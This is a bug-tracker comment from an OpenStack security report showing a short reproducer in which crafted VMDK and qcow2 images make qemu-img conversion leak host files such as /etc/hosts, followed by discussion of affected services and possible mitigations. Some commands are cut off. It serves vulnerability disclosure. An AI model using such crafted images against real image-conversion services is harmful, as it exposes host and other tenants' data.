Comment 2 for bug 1996188
Revision history for this message
| Dan Smith (danms) wrote Re: Arbitrary file access through custom VMDK flat descriptor | #2 |
© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
35a32c5
(Get the code!)
Here's a reproducer of the underlying operation without the need for any nova or glance:
qemu-img create -f vmdk leak.vmdk 1M -o subformat=
sed -i 's#leak-
qemu-img convert -f vmdk -O raw leak.vmdk leak.raw
head -n1 leak.raw
Note that I can repro the behavior with qemu-img using qcow2 as well:
qemu-img create -f qcow2 -F raw -b /etc/hosts leak.qcow 1M
qemu-img convert -O raw leak.qcow leak2.raw
head -n1 leak2.raw
Which means even people that don't use vmdk can't just ban that format to work around this, I suspect.
This helps quantify what I think is going on here under the covers so we can determine which other projects are affected. Glance does effectively the above commands if image conversion is enabled, so I suspect it is affected without needing nova at all, if and when image conversion is in use. I'll have to check.
Not sure about cinder, but I suspect if it can lay down a COW-based image on a volume in raw format, it too is probably affected.
I'm guessing that maybe we'll need to come up with some difficult rules about backing file locations and inspect/reject based on those. I would say that nova requiring that backing files are in /var/lib/nova would be enough, but that wouldn't prevent me from snooping someone else's image if I could determine their UUID.